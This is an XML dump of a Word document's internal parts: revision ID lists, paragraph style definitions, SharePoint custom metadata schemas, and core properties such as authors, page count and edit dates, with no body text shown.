    <w:rsid w:val="00B35765"/>
    <w:rsid w:val="00B3654E"/>
    <w:rsid w:val="00B377E9"/>
    <w:rsid w:val="00B37E47"/>
    <w:rsid w:val="00B40A82"/>
    <w:rsid w:val="00B41F0B"/>
    <w:rsid w:val="00B4313C"/>
    <w:rsid w:val="00B43F3E"/>
    <w:rsid w:val="00B51F55"/>
    <w:rsid w:val="00B55603"/>
    <w:rsid w:val="00B57843"/>
    <w:rsid w:val="00B57C14"/>
    <w:rsid w:val="00B57FEE"/>
    <w:rsid w:val="00B6041E"/>
    <w:rsid w:val="00B60618"/>
    <w:rsid w:val="00B60BAF"/>
    <w:rsid w:val="00B6263B"/>
    <w:rsid w:val="00B62AE2"/>
    <w:rsid w:val="00B62D07"/>
    <w:rsid w:val="00B6394D"/>
    <w:rsid w:val="00B63D59"/>
    <w:rsid w:val="00B64384"/>
    <w:rsid w:val="00B657FB"/>
    <w:rsid w:val="00B65C4C"/>
    <w:rsid w:val="00B65E64"/>
    <w:rsid w:val="00B66B32"/>
    <w:rsid w:val="00B67A81"/>
    <w:rsid w:val="00B70C6B"/>
    <w:rsid w:val="00B7171B"/>
    <w:rsid w:val="00B71ECE"/>
    <w:rsid w:val="00B736C0"/>
    <w:rsid w:val="00B76BF5"/>
    <w:rsid w:val="00B77674"/>
    <w:rsid w:val="00B77972"/>
    <w:rsid w:val="00B800BC"/>
    <w:rsid w:val="00B804D4"/>
    <w:rsid w:val="00B82334"/>
    <w:rsid w:val="00B829D2"/>
    <w:rsid w:val="00B84222"/>
    <w:rsid w:val="00B843A4"/>
    <w:rsid w:val="00B92EE4"/>
    <w:rsid w:val="00BA013F"/>
    <w:rsid w:val="00BA0153"/>
    <w:rsid w:val="00BA06F1"/>
    <w:rsid w:val="00BA0D21"/>
    <w:rsid w:val="00BA25C6"/>
    <w:rsid w:val="00BA2FD3"/>
    <w:rsid w:val="00BA581F"/>
    <w:rsid w:val="00BA7B6B"/>
    <w:rsid w:val="00BB0F17"/>
    <w:rsid w:val="00BB199D"/>
    <w:rsid w:val="00BB292D"/>
    <w:rsid w:val="00BB2966"/>
    <w:rsid w:val="00BB2F5E"/>
    <w:rsid w:val="00BB3385"/>
    <w:rsid w:val="00BB386F"/>
    <w:rsid w:val="00BB6D64"/>
    <w:rsid w:val="00BB7061"/>
    <w:rsid w:val="00BB7339"/>
    <w:rsid w:val="00BB7CD9"/>
    <w:rsid w:val="00BC131F"/>
    <w:rsid w:val="00BC5132"/>
    <w:rsid w:val="00BC63D1"/>
    <w:rsid w:val="00BD098E"/>
    <w:rsid w:val="00BD0AC7"/>
    <w:rsid w:val="00BD12CF"/>
    <w:rsid w:val="00BD141A"/>
    <w:rsid w:val="00BD1FEE"/>
    <w:rsid w:val="00BD47EB"/>
    <w:rsid w:val="00BD4A30"/>
    <w:rsid w:val="00BD59F5"/>
    <w:rsid w:val="00BD5E52"/>
    <w:rsid w:val="00BE0115"/>
    <w:rsid w:val="00BE09E4"/>
    <w:rsid w:val="00BE183E"/>
    <w:rsid w:val="00BE2BA9"/>
    <w:rsid w:val="00BE36F5"/>
    <w:rsid w:val="00BE4302"/>
    <w:rsid w:val="00BF0611"/>
    <w:rsid w:val="00BF11F5"/>
    <w:rsid w:val="00BF1E4D"/>
    <w:rsid w:val="00BF3446"/>
    <w:rsid w:val="00BF406D"/>
    <w:rsid w:val="00BF5167"/>
    <w:rsid w:val="00BF670E"/>
    <w:rsid w:val="00BF75A8"/>
    <w:rsid w:val="00C008F6"/>
    <w:rsid w:val="00C02217"/>
    <w:rsid w:val="00C06644"/>
    <w:rsid w:val="00C07A43"/>
    <w:rsid w:val="00C119D9"/>
    <w:rsid w:val="00C15B99"/>
    <w:rsid w:val="00C16F1B"/>
    <w:rsid w:val="00C22BA9"/>
    <w:rsid w:val="00C23EE4"/>
    <w:rsid w:val="00C24E72"/>
    <w:rsid w:val="00C263D5"/>
    <w:rsid w:val="00C27FC6"/>
    <w:rsid w:val="00C3191A"/>
    <w:rsid w:val="00C33A0C"/>
    <w:rsid w:val="00C33AE8"/>
    <w:rsid w:val="00C35C09"/>
    <w:rsid w:val="00C37162"/>
    <w:rsid w:val="00C400CB"/>
    <w:rsid w:val="00C41286"/>
    <w:rsid w:val="00C4341E"/>
    <w:rsid w:val="00C43528"/>
    <w:rsid w:val="00C44937"/>
    <w:rsid w:val="00C47F74"/>
    <w:rsid w:val="00C51304"/>
    <w:rsid w:val="00C54B08"/>
    <w:rsid w:val="00C55934"/>
    <w:rsid w:val="00C56EDB"/>
    <w:rsid w:val="00C57283"/>
    <w:rsid w:val="00C6057F"/>
    <w:rsid w:val="00C608C6"/>
    <w:rsid w:val="00C63E9D"/>
    <w:rsid w:val="00C65506"/>
    <w:rsid w:val="00C70666"/>
    <w:rsid w:val="00C71AB7"/>
    <w:rsid w:val="00C73FBD"/>
    <w:rsid w:val="00C747D8"/>
    <w:rsid w:val="00C74E2A"/>
    <w:rsid w:val="00C7641F"/>
    <w:rsid w:val="00C76D50"/>
    <w:rsid w:val="00C779B5"/>
    <w:rsid w:val="00C8121F"/>
    <w:rsid w:val="00C83146"/>
    <w:rsid w:val="00C83884"/>
    <w:rsid w:val="00C85884"/>
    <w:rsid w:val="00C86C35"/>
    <w:rsid w:val="00C871F2"/>
    <w:rsid w:val="00C87317"/>
    <w:rsid w:val="00C87E2C"/>
    <w:rsid w:val="00C91425"/>
    <w:rsid w:val="00C91872"/>
    <w:rsid w:val="00C9204F"/>
    <w:rsid w:val="00C93BEE"/>
    <w:rsid w:val="00C97A36"/>
    <w:rsid w:val="00CA03EA"/>
    <w:rsid w:val="00CA15BE"/>
    <w:rsid w:val="00CA2680"/>
    <w:rsid w:val="00CA276A"/>
    <w:rsid w:val="00CA5E14"/>
    <w:rsid w:val="00CA6A3E"/>
    <w:rsid w:val="00CA7041"/>
    <w:rsid w:val="00CB06D2"/>
    <w:rsid w:val="00CB1BE6"/>
    <w:rsid w:val="00CB3417"/>
    <w:rsid w:val="00CB4018"/>
    <w:rsid w:val="00CB4414"/>
    <w:rsid w:val="00CB52D2"/>
    <w:rsid w:val="00CC3CFC"/>
    <w:rsid w:val="00CC4282"/>
    <w:rsid w:val="00CC4D94"/>
    <w:rsid w:val="00CC54DE"/>
    <w:rsid w:val="00CC7D68"/>
    <w:rsid w:val="00CD10E8"/>
    <w:rsid w:val="00CD4E9F"/>
    <w:rsid w:val="00CD52BB"/>
    <w:rsid w:val="00CD7BE9"/>
    <w:rsid w:val="00CD7C69"/>
    <w:rsid w:val="00CE1D4F"/>
    <w:rsid w:val="00CE1FF7"/>
    <w:rsid w:val="00CE2925"/>
    <w:rsid w:val="00CE5C4D"/>
    <w:rsid w:val="00CE7FD7"/>
    <w:rsid w:val="00CF0903"/>
    <w:rsid w:val="00CF4CC6"/>
    <w:rsid w:val="00CF60DA"/>
    <w:rsid w:val="00CF688C"/>
    <w:rsid w:val="00CF74B6"/>
    <w:rsid w:val="00D01B17"/>
    <w:rsid w:val="00D047F2"/>
    <w:rsid w:val="00D06594"/>
    <w:rsid w:val="00D13A37"/>
    <w:rsid w:val="00D14370"/>
    <w:rsid w:val="00D16912"/>
    <w:rsid w:val="00D234E8"/>
    <w:rsid w:val="00D24A21"/>
    <w:rsid w:val="00D25DBE"/>
    <w:rsid w:val="00D25F23"/>
    <w:rsid w:val="00D306F2"/>
    <w:rsid w:val="00D32742"/>
    <w:rsid w:val="00D333A3"/>
    <w:rsid w:val="00D33D38"/>
    <w:rsid w:val="00D3487D"/>
    <w:rsid w:val="00D361A2"/>
    <w:rsid w:val="00D36C8A"/>
    <w:rsid w:val="00D37D86"/>
    <w:rsid w:val="00D40DC8"/>
    <w:rsid w:val="00D42444"/>
    <w:rsid w:val="00D44229"/>
    <w:rsid w:val="00D4527F"/>
    <w:rsid w:val="00D46985"/>
    <w:rsid w:val="00D46E8E"/>
    <w:rsid w:val="00D53BBB"/>
    <w:rsid w:val="00D543E9"/>
    <w:rsid w:val="00D54844"/>
    <w:rsid w:val="00D577D7"/>
    <w:rsid w:val="00D609D1"/>
    <w:rsid w:val="00D60D2C"/>
    <w:rsid w:val="00D61A42"/>
    <w:rsid w:val="00D62B99"/>
    <w:rsid w:val="00D6515F"/>
    <w:rsid w:val="00D66338"/>
    <w:rsid w:val="00D708CE"/>
    <w:rsid w:val="00D717F4"/>
    <w:rsid w:val="00D7190D"/>
    <w:rsid w:val="00D71C22"/>
    <w:rsid w:val="00D71CED"/>
    <w:rsid w:val="00D726B9"/>
    <w:rsid w:val="00D72E89"/>
    <w:rsid w:val="00D74B35"/>
    <w:rsid w:val="00D754FA"/>
    <w:rsid w:val="00D7628E"/>
    <w:rsid w:val="00D76707"/>
    <w:rsid w:val="00D81763"/>
    <w:rsid w:val="00D81ABF"/>
    <w:rsid w:val="00D82994"/>
    <w:rsid w:val="00D842BD"/>
    <w:rsid w:val="00D85036"/>
    <w:rsid w:val="00D85674"/>
    <w:rsid w:val="00D9021C"/>
    <w:rsid w:val="00D90BD6"/>
    <w:rsid w:val="00D91C44"/>
    <w:rsid w:val="00D92A25"/>
    <w:rsid w:val="00D945D8"/>
    <w:rsid w:val="00D95F4B"/>
    <w:rsid w:val="00D97531"/>
    <w:rsid w:val="00DA01EF"/>
    <w:rsid w:val="00DA1406"/>
    <w:rsid w:val="00DA197D"/>
    <w:rsid w:val="00DA2E07"/>
    <w:rsid w:val="00DA35FE"/>
    <w:rsid w:val="00DA4073"/>
    <w:rsid w:val="00DA6F15"/>
    <w:rsid w:val="00DA7258"/>
    <w:rsid w:val="00DB0707"/>
    <w:rsid w:val="00DB0B95"/>
    <w:rsid w:val="00DB1BCC"/>
    <w:rsid w:val="00DB56D6"/>
    <w:rsid w:val="00DB7128"/>
    <w:rsid w:val="00DB71D0"/>
    <w:rsid w:val="00DC15AF"/>
    <w:rsid w:val="00DC234A"/>
    <w:rsid w:val="00DC267D"/>
    <w:rsid w:val="00DC26C7"/>
    <w:rsid w:val="00DC68AA"/>
    <w:rsid w:val="00DC707A"/>
    <w:rsid w:val="00DC7496"/>
    <w:rsid w:val="00DD0CC2"/>
    <w:rsid w:val="00DD11B5"/>
    <w:rsid w:val="00DD133D"/>
    <w:rsid w:val="00DD483A"/>
    <w:rsid w:val="00DD70F3"/>
    <w:rsid w:val="00DE66BD"/>
    <w:rsid w:val="00DE7224"/>
    <w:rsid w:val="00DF31D1"/>
    <w:rsid w:val="00DF5C6C"/>
    <w:rsid w:val="00DF687D"/>
    <w:rsid w:val="00E00C89"/>
    <w:rsid w:val="00E07742"/>
    <w:rsid w:val="00E07D7D"/>
    <w:rsid w:val="00E109FF"/>
    <w:rsid w:val="00E10FAB"/>
    <w:rsid w:val="00E122AB"/>
    <w:rsid w:val="00E12A7C"/>
    <w:rsid w:val="00E1334E"/>
    <w:rsid w:val="00E172D7"/>
    <w:rsid w:val="00E205BF"/>
    <w:rsid w:val="00E2105C"/>
    <w:rsid w:val="00E23911"/>
    <w:rsid w:val="00E25320"/>
    <w:rsid w:val="00E25883"/>
    <w:rsid w:val="00E26CF2"/>
    <w:rsid w:val="00E270A6"/>
    <w:rsid w:val="00E273CA"/>
    <w:rsid w:val="00E32243"/>
    <w:rsid w:val="00E34BC1"/>
    <w:rsid w:val="00E3594D"/>
    <w:rsid w:val="00E36361"/>
    <w:rsid w:val="00E36E91"/>
    <w:rsid w:val="00E408A5"/>
    <w:rsid w:val="00E47148"/>
    <w:rsid w:val="00E47225"/>
    <w:rsid w:val="00E51B70"/>
    <w:rsid w:val="00E51BEA"/>
    <w:rsid w:val="00E51D0A"/>
    <w:rsid w:val="00E54587"/>
    <w:rsid w:val="00E55E90"/>
    <w:rsid w:val="00E64055"/>
    <w:rsid w:val="00E64690"/>
    <w:rsid w:val="00E66A39"/>
    <w:rsid w:val="00E670E6"/>
    <w:rsid w:val="00E67863"/>
    <w:rsid w:val="00E70764"/>
    <w:rsid w:val="00E70EB0"/>
    <w:rsid w:val="00E74812"/>
    <w:rsid w:val="00E82A18"/>
    <w:rsid w:val="00E84A63"/>
    <w:rsid w:val="00E857CC"/>
    <w:rsid w:val="00E86D2A"/>
    <w:rsid w:val="00E91D62"/>
    <w:rsid w:val="00E92518"/>
    <w:rsid w:val="00E93B73"/>
    <w:rsid w:val="00E94C22"/>
    <w:rsid w:val="00E970DC"/>
    <w:rsid w:val="00EA0541"/>
    <w:rsid w:val="00EA2E77"/>
    <w:rsid w:val="00EA3EA7"/>
    <w:rsid w:val="00EA409D"/>
    <w:rsid w:val="00EA67E3"/>
    <w:rsid w:val="00EA6BB9"/>
    <w:rsid w:val="00EA6C6D"/>
    <w:rsid w:val="00EB30A5"/>
    <w:rsid w:val="00EB3E8F"/>
    <w:rsid w:val="00EB5C95"/>
    <w:rsid w:val="00EB69E7"/>
    <w:rsid w:val="00EC4C25"/>
    <w:rsid w:val="00EC4ED8"/>
    <w:rsid w:val="00EC6D4B"/>
    <w:rsid w:val="00EC739E"/>
    <w:rsid w:val="00ED03F8"/>
    <w:rsid w:val="00ED1FC7"/>
    <w:rsid w:val="00ED33FB"/>
    <w:rsid w:val="00ED44B4"/>
    <w:rsid w:val="00ED592C"/>
    <w:rsid w:val="00ED5DE1"/>
    <w:rsid w:val="00EE1BF8"/>
    <w:rsid w:val="00EE3C19"/>
    <w:rsid w:val="00EE58B6"/>
    <w:rsid w:val="00EE7BBA"/>
    <w:rsid w:val="00EF03B7"/>
    <w:rsid w:val="00EF0BF7"/>
    <w:rsid w:val="00EF1F99"/>
    <w:rsid w:val="00EF2260"/>
    <w:rsid w:val="00EF29AE"/>
    <w:rsid w:val="00EF3FA1"/>
    <w:rsid w:val="00EF4646"/>
    <w:rsid w:val="00EF4FE4"/>
    <w:rsid w:val="00EF5917"/>
    <w:rsid w:val="00EF5CE9"/>
    <w:rsid w:val="00EF5EB2"/>
    <w:rsid w:val="00EF76F8"/>
    <w:rsid w:val="00F00F8D"/>
    <w:rsid w:val="00F025BF"/>
    <w:rsid w:val="00F03FEE"/>
    <w:rsid w:val="00F0583E"/>
    <w:rsid w:val="00F10796"/>
    <w:rsid w:val="00F12A5B"/>
    <w:rsid w:val="00F12E2E"/>
    <w:rsid w:val="00F13E8D"/>
    <w:rsid w:val="00F14760"/>
    <w:rsid w:val="00F15654"/>
    <w:rsid w:val="00F1568A"/>
    <w:rsid w:val="00F16C38"/>
    <w:rsid w:val="00F16E0B"/>
    <w:rsid w:val="00F171D8"/>
    <w:rsid w:val="00F236B8"/>
    <w:rsid w:val="00F23EEB"/>
    <w:rsid w:val="00F25963"/>
    <w:rsid w:val="00F30200"/>
    <w:rsid w:val="00F3173E"/>
    <w:rsid w:val="00F3219E"/>
    <w:rsid w:val="00F337CC"/>
    <w:rsid w:val="00F33C82"/>
    <w:rsid w:val="00F34346"/>
    <w:rsid w:val="00F35B56"/>
    <w:rsid w:val="00F36439"/>
    <w:rsid w:val="00F36D91"/>
    <w:rsid w:val="00F376D9"/>
    <w:rsid w:val="00F40191"/>
    <w:rsid w:val="00F40932"/>
    <w:rsid w:val="00F42A02"/>
    <w:rsid w:val="00F43188"/>
    <w:rsid w:val="00F4334D"/>
    <w:rsid w:val="00F4393A"/>
    <w:rsid w:val="00F459AF"/>
    <w:rsid w:val="00F47D13"/>
    <w:rsid w:val="00F52B62"/>
    <w:rsid w:val="00F53D91"/>
    <w:rsid w:val="00F53F37"/>
    <w:rsid w:val="00F54E45"/>
    <w:rsid w:val="00F554AD"/>
    <w:rsid w:val="00F56016"/>
    <w:rsid w:val="00F61D5A"/>
    <w:rsid w:val="00F620E0"/>
    <w:rsid w:val="00F62423"/>
    <w:rsid w:val="00F62EF1"/>
    <w:rsid w:val="00F66B3B"/>
    <w:rsid w:val="00F70315"/>
    <w:rsid w:val="00F70BCC"/>
    <w:rsid w:val="00F73F0D"/>
    <w:rsid w:val="00F74C2C"/>
    <w:rsid w:val="00F80E6C"/>
    <w:rsid w:val="00F83691"/>
    <w:rsid w:val="00F86E2C"/>
    <w:rsid w:val="00F87076"/>
    <w:rsid w:val="00F87DF3"/>
    <w:rsid w:val="00F92492"/>
    <w:rsid w:val="00F92BFD"/>
    <w:rsid w:val="00F92D91"/>
    <w:rsid w:val="00F92EF7"/>
    <w:rsid w:val="00F94BBB"/>
    <w:rsid w:val="00F95E54"/>
    <w:rsid w:val="00FA0192"/>
    <w:rsid w:val="00FA02DD"/>
    <w:rsid w:val="00FA1AAF"/>
    <w:rsid w:val="00FA2EF9"/>
    <w:rsid w:val="00FB1FCB"/>
    <w:rsid w:val="00FB6009"/>
    <w:rsid w:val="00FB6A51"/>
    <w:rsid w:val="00FB703A"/>
    <w:rsid w:val="00FC0929"/>
    <w:rsid w:val="00FC3194"/>
    <w:rsid w:val="00FC3634"/>
    <w:rsid w:val="00FC3E47"/>
    <w:rsid w:val="00FC4162"/>
    <w:rsid w:val="00FC4783"/>
    <w:rsid w:val="00FC7DCD"/>
    <w:rsid w:val="00FD05A2"/>
    <w:rsid w:val="00FD1982"/>
    <w:rsid w:val="00FD3469"/>
    <w:rsid w:val="00FD4A31"/>
    <w:rsid w:val="00FD4B8F"/>
    <w:rsid w:val="00FD5D4C"/>
    <w:rsid w:val="00FD7E5D"/>
    <w:rsid w:val="00FE01D5"/>
    <w:rsid w:val="00FE360F"/>
    <w:rsid w:val="00FE6DD3"/>
    <w:rsid w:val="00FE6FF4"/>
    <w:rsid w:val="00FF193F"/>
    <w:rsid w:val="00FF267C"/>
    <w:rsid w:val="00FF3964"/>
    <w:rsid w:val="00FF3DB7"/>
    <w:rsid w:val="00FF5648"/>
    <w:rsid w:val="00FF5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B36AB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{66853863-D953-4852-B40C-60EF32417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5EB"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Default"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00551BBD"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto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BBD"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Georgia"/>
      <w:b/>
      <w:bCs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8A9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D721A"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsia="Calibri" w:hAnsi="Georgia" w:cs="Georgia"/>
      <w:color w:val="000000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5D4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B44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4C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93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D38"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00593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D38"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibr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UsedforCustomAITraining xmlns="2c227bb7-df56-4067-b93f-1d4f0cc6f6d2">false</UsedforCustomAITraining>
    <TaxCatchAll xmlns="f7e07ca7-6d23-4fcc-95ba-0b0025113b4d" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="2c227bb7-df56-4067-b93f-1d4f0cc6f6d2">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <NoofFiles xmlns="2c227bb7-df56-4067-b93f-1d4f0cc6f6d2" xsi:nil="true"/>
    <SharedWithUsers xmlns="f7e07ca7-6d23-4fcc-95ba-0b0025113b4d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82C1FF49F5C34AA96DF504F33192E2" ma:contentTypeVersion="20" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="3f62f2a242ba0fde4a54683d9609b1ea">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="f7e07ca7-6d23-4fcc-95ba-0b0025113b4d" xmlns:ns3="2c227bb7-df56-4067-b93f-1d4f0cc6f6d2" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="6a7f3f3b37578526957e7c6cde415025" ns2:_="" ns3:_="">
    <xsd:import namespace="f7e07ca7-6d23-4fcc-95ba-0b0025113b4d"/>
    <xsd:import namespace="2c227bb7-df56-4067-b93f-1d4f0cc6f6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NoofFile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UsedforCustomAITraining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e07ca7-6d23-4fcc-95ba-0b0025113b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f5eaa3f-6329-4ce2-989f-a5cbf7200f3b}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="f7e07ca7-6d23-4fcc-95ba-0b0025113b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227bb7-df56-4067-b93f-1d4f0cc6f6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ofFiles" ma:index="14" nillable="true" ma:displayName="No of Files" ma:format="Dropdown" ma:internalName="NoofFiles" ma:percentage="FALSE">
      <xsd:simpleType>
        <xsd:restriction base="dms:Number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6a16047-21a3-4ce8-9699-b51ff40764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UsedforCustomAITraining" ma:index="24" nillable="true" ma:displayName="Used for Custom AI Training" ma:default="0" ma:description="Custom Project - Training Proprietary AI models May '23 (Led by Steve Graham)" ma:format="Dropdown" ma:internalName="UsedforCustomAITraining">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean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76FE72-0FBF-4ED4-8D4C-3031C44827F5}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="2c227bb7-df56-4067-b93f-1d4f0cc6f6d2"/>
    <ds:schemaRef ds:uri="f7e07ca7-6d23-4fcc-95ba-0b0025113b4d"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CB8BD092-DE9B-4A4D-87BF-C72E36E66F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e07ca7-6d23-4fcc-95ba-0b0025113b4d"/>
    <ds:schemaRef ds:uri="2c227bb7-df56-4067-b93f-1d4f0cc6f6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C8C4C0-9625-41BB-A003-55AF2B8FADF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1845</TotalTime>
  <Pages>170</Pages>
  <Words>10239</Words>
  <Characters>64203</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>8025</Lines>
  <Paragraphs>3722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Abid Hussain</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lalitha Kurma</cp:lastModifiedBy>
  <cp:revision>1404</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-29T05:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-14T09:43:00Z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0x0101003D82C1FF49F5C34AA96DF504F33192E2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Order">
    <vt:r8>1350100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GrammarlyDocumentId">
    <vt:lpwstr>83b9f4307ada5d95da24a9a7fcca086f9568bb52db38f4b833d5bdbb7bcf39fe</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>